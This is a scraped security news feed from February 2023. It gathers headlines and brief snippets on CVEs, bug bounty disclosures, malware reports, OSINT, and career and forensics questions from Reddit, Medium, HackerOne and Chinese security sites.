    ClamAV 0.103.8, 0.105.2 and 1.0.1 patch versions published https://blog.clamav.net/2023/02/clamav-01038-01052-and-101-patch.html submitted by /u/Neustradamus [link] [comments]
    How to transition from SOC Analyst to SIEM Engineer?
    So I've been working as a SOC analyst for the last year or so with a MSSP. I've been enjoying it but working with the SIEM sounds really interesting. I think it would be cool to learn tuning and things like that. Problem is I have a ton of experience triaging and investigating alerts but zero experience administering the SIEM. Any ideas? Have any of you made that switch? submitted by /u/_thelinuxnoob_ [link] [comments]
    Was the chinese baloon a memetic or cyber attack ?
    Seems to me this event obscured many current event stories for this circus, essentially paralysis journalistic industry. Were there some cyber attacks starting while journalism was thus paralyzed ? While our attention was artificially detracted. submitted by /u/transdimensionalmeme [link] [comments]
  • Open

    The Advancements in AI and Bug Hunting “A Look at OpenAI’s GPT-3 and Its Future Developments”
    Hey there! Welcome to the world of bug bounty hunting. As a bug bounty expert, let me share with you a story about my recent experience in… Continue reading on Medium »
    The Integration of OpenAI’s GPT-3 in Ethical Hacking and Penetration Testing
    Once upon a time, there was a hacker who was always on the lookout for new and innovative ways to break into systems. He had a reputation… Continue reading on Medium »
    The Power of Predictive Analysis “How OpenAI’s GPT-3 is Driving the Future of Bug Hunting”
    As a bug bounty expert, I have seen firsthand how the world of cybersecurity is constantly evolving. New threats arise every day, and as… Continue reading on Medium »
    The Possibilities and Risks of Using OpenAI’s GPT-3 in Mobile Application Bug Hunting
    Once upon a time, in the world of bug bounty hunting, a new player emerged — OpenAI’s GPT-3. The buzz around this language processing tool… Continue reading on Medium »
    Exploring the Use Cases of OpenAI’s GPT-3 in Web Application Bug Hunting
    Once upon a time, in a land far, far away, there was a group of hackers who wanted to test their skills and earn some extra cash. They… Continue reading on Medium »
    How OpenAI’s GPT-3 is Impacting the Career Paths of Bug Hunters
    Once upon a time, in the world of cybersecurity, a group of skilled bug hunters roamed the internet, hunting for vulnerabilities in… Continue reading on Medium »
    The Advantages and Limitations of Using OpenAI’s GPT-3 in Bug Hunting
    As a bug bounty expert, I’ve seen all kinds of techniques used to find vulnerabilities in software. But one of the most interesting… Continue reading on Medium »
    The Ethics of AI in Bug Hunting “Examining the Implications of OpenAI’s GPT-3”
    Bug hunting, also known as ethical hacking, has become a crucial part of modern cybersecurity. Continue reading on Medium »
    How OpenAI’s GPT-3 is Making Bug Hunting More Efficient and Accurate
    As a bug bounty expert, I’ve seen the industry evolve over the years with new technologies and tools being introduced every now and then… Continue reading on Medium »
    The Future of Bug Hunting “How OpenAI’s GPT-3 is Revolutionizing the Industry”
    In the world of technology, bugs are inevitable. These errors in code can cause programs to malfunction, create security vulnerabilities… Continue reading on Medium »
  • Open

    Unclaimed official s3 bucket of tendermint(tendermint-packages) which is used by many other blockchain companies in their code
    Cosmos disclosed a bug submitted by bhatiagaurav1211: https://hackerone.com/reports/1397826 - Bounty: $400
    CVE-2023-23914: curl HSTS ignored on multiple requests
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1813864
    CVE-2023-23915: HSTS amnesia with --parallel
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1814333
    connect.8x8.com: Users with no permission can track/access restricted details/data via GET /api/v2/support/requests/HTTP/2
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1499114 - Bounty: $777
    connect.8x8.com: admin user can send invites on behalf of another admin user via POST /api/v1/users//invites
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1474536 - Bounty: $777
    connect.8x8.com: deactivated users remain access to /api/v1/users/UUID/roles
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1473071 - Bounty: $777
    jaas.8x8.vc: Removed users can still have READ/WRITE access to the workspace via different API endpoints
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1479894 - Bounty: $777
    admin.8x8.vc: Member users with no permission can integrate email to connect calendar via GET /meet-external/spot-roomkeeper/v1/calendar/auth/init?..
    8x8 Bounty disclosed a bug submitted by emperor: https://hackerone.com/reports/1486310 - Bounty: $777
  • Open

    Dark Web Monitoring and OSINT Investigations for online protection
    Nowadays, more global corporations are conducting business online in this age of digital transformation. This provides numerous advantages… Continue reading on Medium »
    DarkNet OSINT Guide
    Guide to the dark side of the internet. Continue reading on The Sleuth Sheet »
  • Open

    Some pictures & videos of countries & cities
    I think promo pictures and videos of various cities and countries, https://www.mmvideo.fr/dvd/ submitted by /u/BustaKode [link] [comments]
  • Open

    Server-side prototype pollution: Black-box detection without the DoS
    submitted by /u/Gallus [link] [comments]
    Cross-Thread Return Address Predictions
    submitted by /u/Gallus [link] [comments]
    cURL audit: How a joke led to significant findings
    submitted by /u/Gallus [link] [comments]
    HAProxy Security Update (CVE-2023-25725) - HTTP content smuggling attack
    submitted by /u/Gallus [link] [comments]
    Google Lets Anyone See Original Uncropped Images – Proof of Concept
    submitted by /u/moxofoxo [link] [comments]
    Could Electric Vehicles Be Hacked? Meta-analysis on the risks of the EV ecosystem.
    A meta analysis on the security risks linked to the EV ecosystem. Highlights include: A large number of connection points (Wi-Fi, phones, OTA updates, charging stations) Large number of computerized parts. Potentially deadly disruptions (causing accidents, igniting battieres). Potential to disrupt power grids. Potential for worms that propagate via the charging network. Flaws and PoC attacks. Lack of laws or industry standards that limit wireless connections to critical components. submitted by /u/UnexpectedLizard [link] [comments]
  • Open

    SecWiki News 2023-02-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-15 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Mirai Variant V3G4 Targets IoT Devices
    We observed Mirai variant V3G4 targeting IoT devices in three separate campaigns in 2022. The post Mirai Variant V3G4 Targets IoT Devices appeared first on Unit 42.
  • Open

    一文讲透丨如何破解安全应用容器架构的17大挑战!
    众所皆知,云计算/云原生技术因能极大地提高云上资源利用率以及应用交付效率而被广泛采用。然而,云计算/云原生技术的发展也让用户遭受了更多高级威胁与攻击。如何构建有效的云原生安全管理体系应对层出不穷的安全威胁这一问题也一直受到千行百业用户的关注与热议。国际云安全联盟CSA发布报告《实现安全应用容器架构的最佳实践》该报告旨在成为《保护应用容器和微服务所面临的挑战》文档的配套文档。《保护应用容器和微服务所
    FreeBuf早报 | 俄罗斯拟豁免亲俄黑客的法律责任;内蒙古通报19款侵害用户权益的App
    土耳其和叙利亚发生大地震后,金融诈骗犯利用这场自然灾害诱骗人们向慈善机构捐款,谋取私利。
    土耳其和叙利亚地震后,网络捐款诈骗遍地开花
    在土耳其和叙利亚发生大地震后,金融诈骗犯利用这场自然灾害诱骗人们向慈善机构捐款,谋取私利。
    赶快更新!Apple 出现多个安全漏洞
    2022 年,苹果总共修复了 10 个 0day,4 个漏洞是在 WebKit 中发现的。
    渗透测试 | 信息收集之贯穿全局
    这个世界上只有两种人,黑客和被黑客攻击的人。
  • Open

    某 T 路由器固件解压缩探秘
    作者:sn0w_xxx@知道创宇404实验室 日期:2023年2月15日 准备工具 1.某T固件 2.某T路由器 3.ida 4.binwalk 5.xz-5.6.2 6.squashfs-tools 7.010 Editor 开始分析 固件初始分析 1.利用binwalk -Me + 固件名提取固件中的文件系统,发现提取失败 2.使用binwalk -E + 固件名命令查看固件的熵...
  • Open

    某 T 路由器固件解压缩探秘
    作者:sn0w_xxx@知道创宇404实验室 日期:2023年2月15日 准备工具 1.某T固件 2.某T路由器 3.ida 4.binwalk 5.xz-5.6.2 6.squashfs-tools 7.010 Editor 开始分析 固件初始分析 1.利用binwalk -Me + 固件名提取固件中的文件系统,发现提取失败 2.使用binwalk -E + 固件名命令查看固件的熵...
  • Open

    HAProxy Security Update (CVE-2023-25725)
    Article URL: https://www.mail-archive.com/haproxy@formilux.org/msg43229.html Comments URL: https://news.ycombinator.com/item?id=34798082 Points: 2 # Comments: 0

  • Open

    Nice glossary for basics - An Droid
    submitted by /u/-Rammus- [link] [comments]
    Large dir of videos including an archive of Dr. Gene Scott's conspiracy infused tv sermons.
    Marking nsfw as I didn't explore too deep. Scott sure loved horses, ufos, and egyptian mytholgy. https://video.lemoin.com/mp4/ submitted by /u/inoculatemedia [link] [comments]
  • Open

    Saving Millions in 2023 with Specification-Guided Fuzzing
    Introduction Continue reading on Veridise »
  • Open

    Saving Millions in 2023 with Specification-Guided Fuzzing
    Introduction Continue reading on Veridise »
  • Open

    Can anything be done to require egregious security holes such as Twitter spoofed blue accounts
    Having seen https://twitter.com/elonmusk/status/1625368108461613057?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1625368108461613057%7Ctwgr%5Ebfddd921861e4f88001269823af861be3ffd793c%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fmetro.co.uk%2F2023%2F02%2F14%2Felon-musk-tries-to-force-feed-his-tweets-to-twitter-users-18280663%2F , I have to believe that this is a spoofed source since I don't think that even Elon Musk is that out of touch. I saw a few articles stating that people with verified accounts were able to change their name to Elon Musk and thus get tweets posted as belonging to Elon Musk. Is Twitter unable to stop this problem, even if it only involved people changing their display name to Elon Musk, and what does that say about security on the large social media sites. Are there any minimum standards for identity integrity. submitted by /u/PleaseThinkFirst [link] [comments]
    What's a decent cybersecurity salary in London?
    I have been offered an entry-level cybersecurity job in London, and wondering what's a decent salary there, according to the current situation in the industry and the cost of living there. I'm a EU citizen, quite new to cybersecurity (and by no means a seasoned expert), but I also have a few years experience in other type of positions in tech companies, so not really a fully inexperienced worker either. I have: - A BSc in engineering - A MSc in cybersecurity - A 6 month internship in a mid-size cybersecurity consultancy firm (mostly pentesting) - 4 years experience in another tech company (one of the big ones), not related to cybersecurity (most of this time I was managing a technical team but my job was not really technical) - I speak 3 languages, one of them being fluent English. Any info would be highly appreciated, just to make sure they are not lowballing me :D Regards! submitted by /u/BroX111 [link] [comments]
    FIPS 197 certification
    I am having trouble trying to understand FIPS 197 certification. Can any organization apply for this? Say I have a product which uses encryption. Does my product get certified, or is it that I am using certified encryption (FIPS) "WITHIN" my product. submitted by /u/87390989 [link] [comments]
    What osi layers are this ports relative?
    I'm stuying ports and I'm not sure which osi layers represents this following ports: SMB 445 Syslog 514 (i think 4) Imap4 993 Encrypted syslog 6514 Thank you for reading! submitted by /u/MrNoodlesLearns [link] [comments]
    Anyone using Cloudflare ZTNA and have any feedback?
    Have looked at Umbrella, Zscaler and Netskope, Cloudflare the last one we are gonna look at but anyone using it and have any thoughts especially if having used one of these others? submitted by /u/junkaccount1999 [link] [comments]
  • Open

    HTML injection that may lead to XSS on HackerOne.com through H1 Triage Wizard Chrome Extension
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1874260
  • Open

    Finding a Trace | Trace Labs Search Party CTF 2023
    I recently participated in the Search Party Capture The Flag (CTF) competition — a global event run by the non-profit organisation, Trace… Continue reading on Medium »
    Geo-location exercise.
    How I geo-located one of the video shooting sites from Miley Cyrus’s hit song, Flowers. This one is the first time I write about how I… Continue reading on Medium »
    Paste Sites — búsqueda de credenciales filtradas
    Los Paste Sites son sitios donde se comparte código y otros datos en forma de texto. Continue reading on Medium »
    Creating custom requests for Lampyre desktop app
    Even though we offer a huge list of over 230 types of requests, you may still need to enrich your investigation with more information: get… Continue reading on Medium »
  • Open

    Discover the 5 Best Automation Tools for Bug Bounty Hunters
    Bug bounty hunting is the practice of finding security vulnerabilities in websites, software,… Continue reading on Bug Zero »
    ChatGPT Hacking Prompts, SQLi, XSS, Vuln Analysis, Nuclei Templates, and more
    Several prompts for hacking with ChatGPT I’ve consolidated with demos. Continue reading on System Weakness »
    HTML Injection to RCE
    HTML injection, also known as cross-site scripting (XSS), is a type of vulnerability that allows attackers to inject malicious code into a… Continue reading on Medium »
    How I Discovered a Password Vulnerability
    Password security is an increasingly important topic as passwords are often used throughout the average person’s daily life. With so much… Continue reading on Medium »
  • Open

    Open-Source Vulnerability Management
    Article URL: https://docs.mergestat.com/blog/2023/02/13/open-source-vulnerability-management Comments URL: https://news.ycombinator.com/item?id=34792014 Points: 1 # Comments: 0
    Overcoming Developer Fatigue: Strategies for Streamlining Vulnerability Fixes
    Article URL: https://sysdig.com/blog/vulnerability-prioritization-fatigue-developers/ Comments URL: https://news.ycombinator.com/item?id=34791445 Points: 4 # Comments: 0
    Re: Double-free vulnerability in OpenSSH server 9.1 (CVE-2023-25136)
    Article URL: https://seclists.org/oss-sec/2023/q1/92 Comments URL: https://news.ycombinator.com/item?id=34786201 Points: 1 # Comments: 0
  • Open

    SecWiki News 2023-02-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    A Memory Resident Payload for CVE-2022-47966
    Article URL: https://vulncheck.com/blog/cve-2022-47966-payload Comments URL: https://news.ycombinator.com/item?id=34791132 Points: 9 # Comments: 0
    Re: Double-free vulnerability in OpenSSH server 9.1 (CVE-2023-25136)
    Article URL: https://seclists.org/oss-sec/2023/q1/92 Comments URL: https://news.ycombinator.com/item?id=34786201 Points: 1 # Comments: 0
  • Open

    HackDojo: search engine for top security conference presentations and whitepapers
    submitted by /u/sea__tak [link] [comments]
    A Different Payload for ManageEngine's CVE-2022-47966
    submitted by /u/chicksdigthelongrun [link] [comments]
    Exploiting a remote heap overflow with a custom TCP stack
    submitted by /u/Gallus [link] [comments]
  • Open

    FreeBuf早报 |Apple产品多个漏洞风险通告;Hydra 消亡后暗网收入大幅下降
    攻击者可组合利用CVE-2023-23529和CVE-2023-23514提升权限并逃逸 Safari 沙箱。
    黑客创建恶意Dota 2游戏模式,秘密部署后门
    Dota 2的玩家注意了,你使用的游戏模式很可能被黑客盯上了。
    美国数万人被骗,损失超7亿美元,情节人为何成情人劫?
    网络钓鱼专家警告说,随着恋爱诈骗案的飙升,要理智的对待感情生活。
    浅谈云安全的技术实践与格局变迁 |FreeBuf咨询洞察
    云安全市场需求从以资源为中心转移到以应用为中心,包括应用敏捷交付、快速弹性、平滑迁移、无损容灾等。
    赶紧排查这个零日漏洞!全球已有130多家企业组织中招
    Clop 勒索软件组织最近利用 GoAnywhere MFT 安全文件传输工具中的零日漏洞,从 130 多个企业组织中窃取了数据。
  • Open

    How to see which IPs my Windows Server 2016 has interacted with
    Hi. We are looking into unauthorized email sent from our company's systems last week. The email was routed through our internal server machine running mdaemon mail system (lets call the machine 172.22.22.22) to our external mail server (73.33.33.33) and from there to a gmail address. Ofc these are not real IPs. The person whose account was used to send the email swears he did not send it. In fact he is the one who notified us when he noticed the unrecognized email in their sent box. Also the email contains "sent from my galaxy" footer, and this person does not own any samsung/galaxy devices. So I want to identify which device/client exactly connected to 172.22.22.22 to initiate the mail. Our firewall application logs don't record anything beyond 2 hours. Any sniffer logs seem to be not recording anything AT ALL. While we fix these problems, any chance I might get a list of IPs that connected to the server at the time of email anywhere else? submitted by /u/saadjumani [link] [comments]
  • Open

    Assumed Breach Assessment Case Study: Uncovering WeSecureApp’s Approach
    This blog post focuses on the Assumed Breach Assessment approach with an assessment case study performed by the WSA team. But first, Continue reading on Medium »
    Automate Boring Red Team Tasks, SSH Wrappers
    Secure Shell (SSH) is a secure network protocol that is widely used for remote administration of computers, data transfer, and connecting… Continue reading on Medium »
  • Open

    7 Ways Threat Actors Deliver macOS Malware in the Enterprise
    submitted by /u/dmchell [link] [comments]
  • Open

    Training and CTFs
    The military has a couple of adages...one, "you fight like you train", and another being, "the more you sweat in peace, the less you bleed in war." The idea behind these adages is that progressive, realistic training prepares you for the job at hand, which is often one performed under "other than optimal" conditions. You start by learning in the classroom, then in the field, and then under austere conditions, so that when you do have to perform the function(s) or task(s) under similar conditions, you're prepared and it's not a surprise. This is also true of law enforcement, as well as other roles and functions. Given the pervasiveness of this style of training and familiarization, I would think that it's suffice to say that it's a highly successful approach. The way DFIR CTFs, while fun,…

  • Open

    How would you proceed to recover data from these ancient devices?
    submitted by /u/L4Z3R_H4WK [link] [comments]
    .LNK files on secondary storage
    Im examining a Omen HP laptop, that had one M2 SSD and one HDD for storage. What would be the reasoning that a .LNK discovered on the HDD that points to the C: drive? The .LNK file of interest points back to C:\Users*target*. This user name differs from the one currently on the OS drive. submitted by /u/comoestasbitcheZ [link] [comments]
    HDD Repair and data recovery for forensics
    Where can I study cleanroom hard drive repair? I'd like to start with repairs and data recovery, but I can't find anything. They asked me 4200 Euros for a 3-day course, but I can't afford this expense submitted by /u/Zipper_Ita [link] [comments]
    Career
    This is a bit of a weird and open ended question - but how do people find working in digital forensics who have been employed in this role for a while? Particularly in a law enforcement setting - rewarding? Difficult? Pros and cons? Training?Thanks all submitted by /u/OkGrape5530 [link] [comments]
  • Open

    What would you say is the difference between a senior Application Security Engineer vs non senior?
    I think the title speaks for itself :) submitted by /u/herbertisthefuture [link] [comments]
    I really need to stop looking at logs. Am I paranoid now?
    I noticed on my ATT router that I received several ICMB Echo Requests and general discards from an IP belonging to Tenable. Tenable is basically a vulnerability tester right? Could someone be using Nessus or something else to target me? 10 times this IP was logged, a few times for echo request and discards for the other. UDP TCP and ICMP Am I crazy or is this indicative of someone basically pen testing my home network? Thanks for your time submitted by /u/themostofpost [link] [comments]
    what would a full scale war in cyberspace look like?
    With things heating up in Eastern Europe and China both countries it seems like it would be inevitable that we would have to deal with direct confrontation with Russia and China eventually. Being that both countries are not only nuclear superpowers but also have cyber capabilities I am coming to wonder what it would look like in the cyber sphere when that confrontation happens? submitted by /u/milesofjoy87 [link] [comments]
    LinkedIn: Counter-OSINT of Those Whom Swarmed My Canary Profile
    I keep a LinkedIn account, with my name, all of the privacy settings set to maximum, except for hibernation. It is intentionally difficult to find. I pay for LinkedIn Premium to get insights into whom searches for me. I use this account as a "canary" to detect when people are trying to look me up. Activity on the account is relatively low. Recently, I was overwhelmed by 50 accounts in the space of only one hour. Most accounts were sock puppets, using private or semi-private modes. The results from linkedin of whom visited my profile were as follows: Someone on LinkedIn Someone at Big Company Business Owner from Atlanta Metro Region Doctor at Saint Fictious Hospital I'm working to identify who viewed me. Tiny companies are generally easy, the results of "Someone on LinkedIn" are not findable. LinkedIn's normal user search tools are not sufficient for entries such as "Doctor at Saint Fictious Hospital." What OSINT tools specific to LinkedIn would you recommend to better search LinkedIn profiles, besides Google, or LinkedIn itself? Any decent recruiter / lead style tools? Paid and unpaid tools are both viable options. submitted by /u/opethharlequinforest [link] [comments]
    Question about website
    Hi guys, I don't know where else to ask but I was working on a project and clicked on a random website that instantly closed. I checked virustotal and it came up safe with 0/90, then booted up my VM to check what the website was doing and there was nothing suspicious, no weird calls or communication, no files downloaded, so I was wondering if there's anyone who can check the website for me in case I missed something because I'm curious why it immediately closed without me doing anything but I can't recreate it anymore.Update mid posting: I clicked on it from google link originally and tried doing it again on my VM and it seems to redirect me to a website called illuminatelocks which seems to just redirect like 3 times till finally landing on a random page but on my VM it isn't auto closing. Checking the firefox network tab nothing is downloaded but just to make sure can anyone give me a second opinion? I can provide links if needed. Thank you in advance. Update: After a while I tried to find the google result and I can't seem to find it anymore, and with the google irl it's no longer redirecting me to illuminatelocks but rather staying on the original page this time. submitted by /u/al_ce [link] [comments]
    Is my iPhone hacked?
    So one of my phones iPhone6gwas draining its battery ridiculously fast so I got some logs. Came across a file with this inside… What do you think? S Treatmentios-feature-remoteconfiguration2remoteconfig_unauth_system_test@ߐ@ F Treatmentios-feature-unauth2remoteconfig_unauth_system_test@��@ J Blue*ios-feature-remoteconfiguration2button_color_dummy_property@��A *ios-feature-carplayv22siri_alternate_search_results@��B¿ګ�0$38e8835e-95e0-5030-9469-bd022815fffc submitted by /u/Accomplished-Paper81 [link] [comments]
    Variation of the Vigenère cipher.
    There is this Variation of the Vigenère cipher which contains special characters([|'/<) as well instead of normal alphabets(A-Z). How to decrypt it in plain text? submitted by /u/Somechords77 [link] [comments]
    do all cybersecurity jobs require you to be able to get up at 3AM to respond to an incident?
    So I'm thinking of trying to become either a penetration tester or cybersecurity engineer. Right now I'm most of the way through HTB Academy's InfoSec Fundamentals path but I have A+ and CCNA certifications and I'm working on practice tests for Sec+. I know I don't want to do incident response. My question is do any cybersecurity jobs NOT require me to have to get up arbitrarily at 3AM? If so, which ones? submitted by /u/notburneddown [link] [comments]
  • Open

    N.J. hospital admits data breach involving thousands of patients
    submitted by /u/irckeyboardwarrior [link] [comments]
    How I hacked into a Telecom Network — Part 1 (Getting the RCE)
    submitted by /u/TheCyb3rAlpha [link] [comments]
    Verified Security Test: Malicious File vs EDR
    submitted by /u/DH_Prelude [link] [comments]
    RCE in Western Digital PR4100 NAS (OS 3)
    submitted by /u/albinowax [link] [comments]
  • Open

    Promotion code can be used more than redemption limit.
    Stripe disclosed a bug submitted by d_sharad: https://hackerone.com/reports/1717650 - Bounty: $250
    The Deleted Polls is Still Accessable after 30 Days
    Twitter disclosed a bug submitted by eissen5c: https://hackerone.com/reports/1015373 - Bounty: $560
    Splunk Sensitive Information Disclosure @axiellstore.usahec.org
    U.S. Dept Of Defense disclosed a bug submitted by spell1: https://hackerone.com/reports/1860905
  • Open

    Bypassing CORS configurations to produce an Account Takeover for Fun and Profit
    The bug that is being written about here is from an previous bug bounty engagement for a major telecommunication company. Continue reading on InfoSec Write-ups »
    Bypassing CORS configurations to produce an Account Takeover for Fun and Profit
    The bug that is being written about here is from an previous bug bounty engagement for a major telecommunication company. Continue reading on Medium »
    Logic Error Bug Fix Review
    High severity bug discovered by white hat hacker through bounty platform Immunefi Continue reading on Balancer Protocol »
    The Top Bug Bounty Programs of the Year and How to Maximize Your Earnings
    As a seasoned bug bounty hunter, I can tell you that the world of cybersecurity is constantly evolving, with new vulnerabilities and… Continue reading on Medium »
    The Secret Weapon of Successful Bug Bounty Hunters: NMap NSE Scripts
    Hi guys, This is my first article. As a bug bounty hunter, navigating the vast and complex world of cybersecurity can often feel like… Continue reading on Medium »
    Bug Bounty Programs and Bug Hunters
    Bug bounty programs are platforms that are created by ICT-related companies which allow non-biased computer error hunters/ hackers to… Continue reading on Bug Zero »
    The Role of Artificial Intelligence in Bug Bounty Hunting
    The world of bug bounty hunting is constantly evolving and with the advancements in technology, the role of Artificial Intelligence (AI)… Continue reading on Medium »
    “Hacking for Glory” The Most Inspiring Bug Bounty Hunting Success Stories and Lessons Learned
    Bug bounty hunting is a lucrative and ever-growing field in the world of cybersecurity. With more and more organizations offering bug… Continue reading on Medium »
    Apa itu Bug Bounty? Dan bagaimana cara mempelajarinya? - Bahasa Indonesia
    Bug Bounty atau BugHunter adalah seseorang yang memahami banyak ilmu dibidang cybersecurity dan cukup berpengalaman dalam menemukan… Continue reading on Medium »
    The Most Notable Bug Bounty Hunting Success Stories and Lessons Learned
    Bug bounty hunting has become a lucrative and exciting field, attracting hackers and security enthusiasts from all over the world. The… Continue reading on Medium »
  • Open

    Searching for missing people online
    Last weekend I took part in a capture the flag (CTF) competition run by Trace Labs — a crowd-sourced non-profit organisation to help… Continue reading on Medium »
    Day 30 — Searchlight — IMINT • Walkthrough • TryHackMe
    Today is my 30 on this journey we are going to solve the CTF named Searchlight this time there is no use of terminal : ) Continue reading on Medium »
    CTF Writeup: LA CTF 2023
    This weekend I participated in LA CTF 2023, which went on between 11 Feb. 2023, 04:00 UTC —  12 Feb. 2023, 22:00 UTC.This blog post… Continue reading on Medium »
    How to generate geographical information about a phone number using “Phonenumbers” Python module..
    This entertaining article will show you how to generate geographical information about a phone number using “Phonenumbers” in Python. Continue reading on Medium »
    How did I use Shodan.io to hack my University?
    Shodan finds an FTP anonymous vulnerability in my organization and allows anyone to log in to an FTP server without a username or… Continue reading on Medium »
    Performing OSINT on Corporate Targets
    how to gather essential information about a company. From physical intel to identifying infrastructure assets, we’ll cover it all. Continue reading on Medium »
    Have a safe flight (hacking the boarding pass)
    By now we should all be (more or less) aware that the internet can be a dangerous place and sharing personal information might not always… Continue reading on InfoSec Write-ups »
    OSINT Challenge: 42 Madrid
    OSINT (Open Source Intelligence) is the process of finding relevant information of an asset through open source information. This is… Continue reading on Medium »
    OSINT Quizzes I Found On Twitter
    Two OSINT geographical quizzes that i solved recently. Continue reading on Medium »
  • Open

    How I hacked into a Telecom Network — Part 1 (Getting the RCE)
    submitted by /u/TheCyb3rAlpha [link] [comments]
    How I Hacked A Company (My First Red Team Engagement 🚩)
    submitted by /u/glum-platimium [link] [comments]
    How your messenger used for internal communication (Teams or S4B) might compromise your company
    https://badoption.eu/blog/2023/02/12/S4B_Teams.html A conglomeration about techniques for S4B and Teams and risks. Nothing really innovative, but as this works so often in the real world just wanted to rise the awareness for this. submitted by /u/PfiatDe [link] [comments]
  • Open

    The Secret Weapon of Successful Bug Bounty Hunters: NMap NSE Scripts
    Hi guys, This is my first article. As a bug bounty hunter, navigating the vast and complex world of cybersecurity can often feel like… Continue reading on Medium »
    Threat Hunting — (Threat Intelligence)
    Threat hunting is a proactive security technique that actively searches for potential threats and vulnerabilities within a network. This… Continue reading on Medium »
  • Open

    网络攻防对抗之“左右互搏术”
    本文介绍了一种从攻防两个维度研究分析网络安全对抗技术的方法。
    hackthebox靶机Squashed
    -发现和利用NFS的错误配置 - 通过Linux命令行管理用户 - 利用X11的系统
    FreeBuf早报 | 百事可乐供应商遭勒索攻击;俄罗斯考虑豁免为国家利益效力的黑客
    俄罗斯媒体报道称,杜马信息政策委员会主席亚历山大·欣施泰因宣布,俄罗斯政府正在评估以免除惩罚的方式对待为莫斯科利益行事的黑客。
    警惕!PyPI Python软件包存在多种恶意代码
    研究人员发现Python软件包索引(PyPI)中存在四个不同的流氓软件包。
    加利福尼亚医疗机构遭遇数据泄露,330 万患者受到影响
    网络安全专家提醒受影响的患者应注意网络钓鱼攻击、诈骗、社会工程或使用被盗数据的勒索。
    0源码基础学习Spring源码系列(一)——Bean注入流程
    通过本文,读者可以0源码基础的初步学习spring源码,并能够举一反三从此进入源码世界的大米! 由于是第一次阅读源码,文章之中难免存在一些问题,还望包涵指正!
    见证历史?据传国内45亿条快递数据泄露
    2月12日晚间,Telegram某机器人泄露出国内45亿条快递信息,数据包大小达435GB!
    中睿天下&Coremail联合发布《2022年第四季度企业邮箱安全报告》(附下载)
    中睿天下联合CAC邮件安全大数据中心发布《2022年第四季度企业邮箱安全报告》。
    检测 Sliver 框架横向平移的机会
    目前 Sliver 已经成为仅次于 Cobalt Strike 和 Metasploit 的第三大 C&C 框架,针对性的检测也已经成为热点话题。
    FreeBuf早报 | 7名俄罗斯人因勒索软件被制裁;ChatGPT将冲击印度 IT 外包公司
    英国和美国政府9日对七名俄罗斯国民实施了制裁,因为他们与TrickBot,Ryuk和Conti网络犯罪行动有联系。
  • Open

    SecWiki News 2023-02-13 Review
    2023年国家自然科学基金安全领域部分题目列表 by ourren Tailscale在内网渗透中利用的研究 by 路人甲 VirusTotal 版本的引擎与桌面版引擎的比较分析 by Avenger SecWiki周刊(第467期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-13 Review
    2023年国家自然科学基金安全领域部分题目列表 by ourren Tailscale在内网渗透中利用的研究 by 路人甲 VirusTotal 版本的引擎与桌面版引擎的比较分析 by Avenger SecWiki周刊(第467期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Step-1 in Cybersecurity “How to Spot Phishing Emails?”
    According to a report by Verizon, 32% of all data breaches involve phishing. In this article, we will see how to spot phishing emails and… Continue reading on InfoSec Write-ups »
    5G Security: Understanding the Risks and How to Mitigate Them
    No content preview
    OWASP Top 10: A Guide for Pen-Testers & Bug Bounty Hunters
    In this article, we will look at OWASP and the top 10 web application vulnerabilities from OWASP. This is a useful topic for both web app… Continue reading on InfoSec Write-ups »
  • Open

    Step-1 in Cybersecurity “How to Spot Phishing Emails?”
    According to a report by Verizon, 32% of all data breaches involve phishing. In this article, we will see how to spot phishing emails and… Continue reading on InfoSec Write-ups »
    5G Security: Understanding the Risks and How to Mitigate Them
    No content preview
    OWASP Top 10: A Guide for Pen-Testers & Bug Bounty Hunters
    In this article, we will look at OWASP and the top 10 web application vulnerabilities from OWASP. This is a useful topic for both web app… Continue reading on InfoSec Write-ups »
  • Open

    Step-1 in Cybersecurity “How to Spot Phishing Emails?”
    According to a report by Verizon, 32% of all data breaches involve phishing. In this article, we will see how to spot phishing emails and… Continue reading on InfoSec Write-ups »
    5G Security: Understanding the Risks and How to Mitigate Them
    No content preview
    OWASP Top 10: A Guide for Pen-Testers & Bug Bounty Hunters
    In this article, we will look at OWASP and the top 10 web application vulnerabilities from OWASP. This is a useful topic for both web app… Continue reading on InfoSec Write-ups »
  • Open

    How to make an open directory accessible locally only?
    Hi all, I don’t know if this is the right place to post this but here goes: I want to share my media library to guests who occasionally connect to my network via wifi so they can watch what they want on their own devies, basically sharing my library without the need to share login credentials to them one by one. I was thinking that the most elegant solution would be to host a local website (currently trying to make one in localwp) which has an index of my library. How would I go about making an index of my hard drives as if it were open directories? submitted by /u/louiestonanto [link] [comments]
    Should I use a vpn when downloading from filepursuit?
    Because I just did and after i left the website I went to Google something and I got redirected to an error page that said "unusual traffic from your computer network." Granted my VPN was being really glitchy and disconnecting then reconnecting then disconnecting etc... Could that have been why I got an error page? When I'm streaming or ripping from illegal streaming sites I always do but I just discovered filepursuit and thought "this seems pretty straightforward." Should I use one? submitted by /u/Throwaway19992003 [link] [comments]

  • Open

    Parse SSH logs in debug mode
    Do you know any light parser-visualisator for SSH debug mode? submitted by /u/athanielx [link] [comments]
    I need some help/advice understanding something on android.
    When I typed the code *#21# into my keypad, it came back as "call forwarding unconditionally" while then showing voice, data, etc as "not forwarded". What does this mean, and what exactly is being forwarded, and to where? submitted by /u/ExitNo9158 [link] [comments]
    Template for submitting IOCs of hacked sites to their owners?
